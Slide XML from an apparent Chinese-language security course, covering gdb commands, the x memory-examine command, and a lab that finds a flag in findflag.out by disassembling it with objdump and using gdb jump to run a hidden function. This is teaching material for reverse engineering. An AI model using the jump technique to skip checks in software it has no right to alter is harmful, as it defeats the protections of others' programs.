                        <a:t>（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>記憶體位子）</a:t>
                      </a:r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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>設定中斷點（可設定多個）</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000">
                        <a:effectLst/>
                        <a:latin typeface="+mj-ea"/>
                        <a:ea typeface="+mj-ea"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>（執行時到哪裡停止）</a:t>
                      </a:r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994332"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="657699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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>continue</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t> 或是 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>c</a:t>
                      </a:r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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>執行到下一個中斷點</a:t>
                      </a:r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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>顯示區段表頭 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>(-[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>section-]header)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898971"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="657699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>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>list</a:t>
                      </a:r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>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>list</a:t>
                      </a:r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>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>顯示原始碼</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000">
                        <a:latin typeface="+mj-ea"/>
                        <a:ea typeface="+mj-ea"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000"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2000">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>編譯時需加入參數 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>–g)</a:t>
                      </a:r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863895"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="455415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 err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>nexti</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="20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zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>或是</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="20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TW" sz="2000" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>ni</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r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 err="1">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>ni</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>執行下一行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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TW" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>(Step</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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TW" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>over)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753427"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="954017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 err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>stepi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="20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zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>或是</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="20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TW" sz="2000" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>si</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r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 err="1">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>si</a:t>
                      </a:r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>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>執行下一行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>(Step</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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TW" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>into)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                        <a:latin typeface="+mj-ea"/>
                        <a:ea typeface="+mj-ea"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="20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zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>如果遇到</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>call</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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TW" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>function</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>會進去一行一行執行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r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607221"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361379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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>finish</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t> 或是 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>fin</a:t>
                      </a:r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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>fin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>Step</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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TW" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>out</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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TW" sz="2000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CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>從</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>stepinto</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>跳出</a:t>
                      </a:r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736388"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="65769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+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>disassemble [FUNC]</a:t>
                      </a:r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+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>disassemble main</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000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+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>反組譯某函式</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="200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zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>和</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>objdump</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>有點像</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"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266000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="65769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jump</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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或是</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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j [FUNC]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000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j</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2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main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j</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2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*</a:t>
                      </a:r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0x</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2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（記憶體位子）</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000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+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>跳到某個函式</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000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zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>位子執行</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"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09978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11CF80F6-8858-684C-A001-16DEDC095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4475" y="239011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169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0CEB48-FAF5-514B-B665-301154B5E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3487"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr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Gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> 「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>」指令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8948EE-C5CF-114A-98DD-ECD00D42F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4287"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1"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55410C3-A8C0-3E4D-B5B6-FABCE1B63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688978"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="677334" y="1045772"/>
          <a:ext cx="10062234" cy="5468461"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3354078">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1994274213"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3354078">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2603894072"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3354078">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3717154937"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="361379">
                <a:tc gridSpan="3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altLang="zh-TW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[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="20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Address expression</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW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br>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW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altLang="zh-TW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/[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="20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Format</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW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[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="20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Address expression</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW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br>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW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altLang="zh-TW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/[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="20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Length</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW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20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Format</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW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[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="20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Address expression</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW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testArray</a:t>
                      </a:r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[] = "0123456789ABCDEF";</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400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zh-TW" alt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zh-TW" alt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633270"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361379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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>參數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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>範例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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>說明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638032"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="45541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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>x/o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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TW" sz="2000" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>testArray</a:t>
                      </a:r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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>八進位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863017"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="291055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 </a:t>
                      </a:r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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>x/</a:t>
                      </a:r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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW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testArray</a:t>
                      </a:r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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>十六進位</a:t>
                      </a:r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994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 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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>..</a:t>
                      </a:r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decimal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898971"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="41190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 </a:t>
                      </a:r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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>x/u</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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TW" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>$</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>ebp</a:t>
                      </a:r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unsigned decimal</a:t>
                      </a:r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863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 </a:t>
                      </a:r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  <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>x/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t> *0x33323130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binary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7534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 </a:t>
                      </a:r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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>x/d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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TW" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>&amp;a</a:t>
                      </a:r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floating point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607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</a:t>
                      </a:r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address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736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2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266000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1060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TW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zh-TW" sz="2000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instruction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099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endParaRPr lang="en-US" altLang="zh-TW" sz="2000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</a:txBody>
                  <a:tcPr marL="66921" marR="66921" marT="33461" marB="33461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30818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11CF80F6-8858-684C-A001-16DEDC095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4475" y="239011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366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48247A-9B18-B44B-86D7-08ADB16DF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566A16C-42BC-B142-8F54-C7B5CFC5A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3848099"/>
            <a:ext cx="5905102" cy="1174837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A4E577-4A68-BD47-AB5F-A0ADAB0D2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80206"/>
            <a:ext cx="70866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85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F54368-55FB-DA45-B2EF-9C9EB3CC2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如何寫一個安全程式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5802C8-015A-424E-9002-DB144E4F8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2800" strike="sngStrike" dirty="0"/>
              <a:t>寫髒</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" strike="sngStrike" dirty="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" strike="sngStrike" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" strike="sngStrike" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" strike="sngStrike" dirty="0"/>
              <a:t>髒到某個程度的確可能是安全的</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" strike="sngStrike" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>未知攻，焉知防</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-TW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990764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8BDE93-BE3E-9A43-A941-67E1DD1B1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Lab1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>jump</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>找出</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>findflag.out</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>flag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24B1A1E-414E-DF46-8407-4E42445E2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2253021"/>
            <a:ext cx="6769100" cy="1016000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163232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1F1CB2-E006-C44B-B424-6112A35DF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首先 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>findflag.out</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> -d</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>看到一個奇怪的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>名稱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BB82569-F725-CC46-B611-ED8EC0EE9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9384845" cy="4282510"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3532215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A85A77-B3B1-F84A-85E9-4738A3D81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 err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打開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E23CED-B5AA-1942-BFE1-95C3FFB4F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1553"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>看到奇怪的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>那就應該是他了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 直接跳去執行看看</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
